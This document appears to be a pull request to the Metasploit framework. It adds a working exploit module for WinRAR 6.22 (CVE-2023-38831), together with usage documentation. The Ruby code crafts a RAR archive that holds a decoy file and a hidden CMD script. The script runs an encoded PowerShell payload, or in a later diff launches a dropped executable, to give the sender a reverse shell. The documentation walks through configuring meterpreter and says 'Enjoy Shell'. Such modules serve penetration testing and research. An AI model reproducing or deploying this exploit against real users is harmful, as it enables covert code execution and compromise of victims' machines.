### PR TITLE
WinRAR 6.22 (CVE-2023-38831)

### DIFF
--- a/documentation/modules/exploit/windows/fileformat/winrar_cve_2023_38831.md
+++ b/documentation/modules/exploit/windows/fileformat/winrar_cve_2023_38831.md
@@ -1,0 +1,39 @@
+## Vulnerable Application
+This module exploits a vulnerability in WinRAR 6.22 (CVE-2023-38831). When a user opens a crafted RAR file and its embedded document, the decoy document is executed, leading to code execution.
+
+## Verification Steps
+
+1. Start msfconsole
+1. Do: `use exploit/windows/fileformat/winrar_cve_2023_38831`
+1. Do: `set INPUT_FILE /path/to/decoy/file`
+1. Do: `set OUTPUT_FILE /path/to/output/file`
+1. Do: `set PAYLOAD windows/meterpreter/reverse_tcp`
+1. Do: `set LHOST <local IP>`
+1. Do: `set LPORT <local port>`
+1. Do: `exploit`
+
+Target
+
+1. Install WinRAR 6.22
+1. Open OUTPUT_FILE
+1. Click on INPUT_FILE withinin archive
+1. Enjoy Shell
+
+## Scenarios
+
+### Windows
+The exploit creates a RAR file that contains a decoy document and a CMD script. The CMD script is executed when the decoy document is opened, leading to code execution on the target system.
+
+## Options
+
+### INPUT_FILE
+Path to the decoy file (PDF, JPG, PNG, etc.) that will be embedded in the crafted RAR file.
+
+### OUTPUT_FILE
+The filename for the crafted RAR file that will be generated.
+
+## References 
+
+[CVE-2023-38831](https://cve.mitre.org/cgi-bin/cvename.cgi?name=2023-38831)
+[Group-IB Research](https://www.group-ib.com/blog/cve-2023-38831-winrar-zero-day/)
+[Analysis](https://b1tg.github.io/post/cve-2023-38831-winrar-analysis/)

--- a/modules/exploits/windows/fileformat/winrar_cve_2023_38831.rb
+++ b/modules/exploits/windows/fileformat/winrar_cve_2023_38831.rb
@@ -1,0 +1,92 @@
+require 'zip'
+
+class MetasploitModule < Msf::Exploit
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::FILEFORMAT
+  include Msf::Exploit::Powershell
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'WinRAR CVE-2023-38831 Exploit',
+      'Description'    => %q{
+        This module exploits a vulnerability in WinRAR (CVE-2023-38831). When a user opens a crafted RAR file and its embedded document, the decoy document is executed, leading to code execution.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         => ['Alexander "xaitax" Hagenah'],
+      'References'     => [
+        ['CVE', '2023-38831'],
+        ['URL', 'https://www.group-ib.com/blog/cve-2023-38831-winrar-zero-day/'],
+        ['URL', 'https://b1tg.github.io/post/cve-2023-38831-winrar-analysis/']
+      ],
+      'Platform'       => ['win'],
+      'Targets'        => [['Windows', {}]],
+      'Payload'        =>
+        {
+          'Space'       => 4096,
+          'DisableNops' => true
+        },
+      'DisclosureDate' => 'Aug 23 2023',
+      'DefaultTarget'  => 0,
+      'Notes' =>
+        {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
+        }
+      ))
+
+
+    register_options([
+      OptString.new('OUTPUT_FILE', [true, 'The output filename.', 'poc.rar']),
+      OptPath.new('INPUT_FILE', [true, 'Path to the decoy file (PDF, JPG, PNG, etc.).'])
+    ])
+  end
+
+  def exploit
+    temp_dir = Dir.mktmpdir
+    output_rar = File.join(Msf::Config.local_directory, datastore['OUTPUT_FILE'])
+    input_file = datastore['INPUT_FILE']
+    decoy_name = File.basename(input_file)
+    decoy_ext = ".#{File.extname(input_file)[1..]}"
+
+    decoy_dir = File.join(temp_dir, "#{decoy_name}A")
+    Dir.mkdir(decoy_dir)
+
+    psh_payload = cmd_psh_payload(
+      payload.encoded,
+      payload_instance.arch.first,
+      remove_comspec: true,
+      wrap_double_quotes: true
+    )
+
+    base64_psh_payload = Rex::Text.encode_base64(psh_payload)
+
+    bat_script = <<~BAT
+      @echo off
+      powershell -nop -exec bypass -EncodedCommand #{base64_psh_payload}
+      start "" "%~dp0#{decoy_name}"
+    BAT
+
+    bat_path = File.join(decoy_dir, "#{decoy_name}A.cmd")
+    File.write(bat_path, bat_script)
+
+    FileUtils.cp(input_file, File.join(temp_dir, "#{decoy_name}B"))
+
+    zip_path = File.join(temp_dir, 'template.zip')
+    Zip::File.open(zip_path, Zip::File::CREATE) do |zipfile|
+      zipfile.add("#{decoy_name}B", File.join(temp_dir, "#{decoy_name}B"))
+      zipfile.add("#{decoy_name}A/#{decoy_name}A.cmd", bat_path)
+    end
+
+    content = File.binread(zip_path)
+    content.gsub!(decoy_ext + "A", decoy_ext + " ")
+    content.gsub!(decoy_ext + "B", decoy_ext + " ")
+
+    File.binwrite(output_rar, content)
+
+    print_good("Created #{output_rar}")
+
+    FileUtils.remove_entry_secure(temp_dir)
+  end
+end

--- a/modules/exploits/windows/fileformat/winrar_cve_2023_38831.rb
+++ b/modules/exploits/windows/fileformat/winrar_cve_2023_38831.rb
@@ -4,7 +4,6 @@ class MetasploitModule < Msf::Exploit
   Rank = ExcellentRanking
 
   include Msf::Exploit::FILEFORMAT
-  include Msf::Exploit::Powershell
 
   def initialize(info = {})
     super(update_info(info,
@@ -36,10 +35,13 @@ class MetasploitModule < Msf::Exploit
         }
       ))
 
-
     register_options([
       OptString.new('OUTPUT_FILE', [true, 'The output filename.', 'poc.rar']),
       OptPath.new('INPUT_FILE', [true, 'Path to the decoy file (PDF, JPG, PNG, etc.).'])
+    ])
+
+    register_advanced_options([
+      OptString.new('PAYLOAD_NAME', [false, 'The filename for the payload executable.', nil])
     ])
   end
 
@@ -49,22 +51,19 @@ class MetasploitModule < Msf::Exploit
     input_file = datastore['INPUT_FILE']
     decoy_name = File.basename(input_file)
     decoy_ext = ".#{File.extname(input_file)[1..]}"
+    payload_name = datastore['PAYLOAD_NAME'] || Rex::Text.rand_text_alpha(8) + '.exe'
 
     decoy_dir = File.join(temp_dir, "#{decoy_name}A")
     Dir.mkdir(decoy_dir)
 
-    psh_payload = cmd_psh_payload(
-      payload.encoded,
-      payload_instance.arch.first,
-      remove_comspec: true,
-      wrap_double_quotes: true
-    )
+    exe_payload = Msf::Util::EXE.to_win32pe(framework, payload.encoded)
 
-    base64_psh_payload = Rex::Text.encode_base64(psh_payload)
+    payload_path = File.join(decoy_dir, payload_name)
+    File.open(payload_path, "wb") { |file| file.write(exe_payload) }
 
     bat_script = <<~BAT
       @echo off
-      powershell -nop -exec bypass -EncodedCommand #{base64_psh_payload}
+      start "" "%~dp0#{payload_name}"
       start "" "%~dp0#{decoy_name}"
     BAT
 
@@ -77,6 +76,7 @@ class MetasploitModule < Msf::Exploit
     Zip::File.open(zip_path, Zip::File::CREATE) do |zipfile|
       zipfile.add("#{decoy_name}B", File.join(temp_dir, "#{decoy_name}B"))
       zipfile.add("#{decoy_name}A/#{decoy_name}A.cmd", bat_path)
+      zipfile.add("#{decoy_name}A/#{payload_name}", payload_path)
     end
 
     content = File.binread(zip_path)


### PR DESCRIPTION
This module exploits a vulnerability in WinRAR 6.22 (CVE-2023-38831). When a user opens a crafted RAR file and its embedded document, the decoy document is executed, leading to code execution.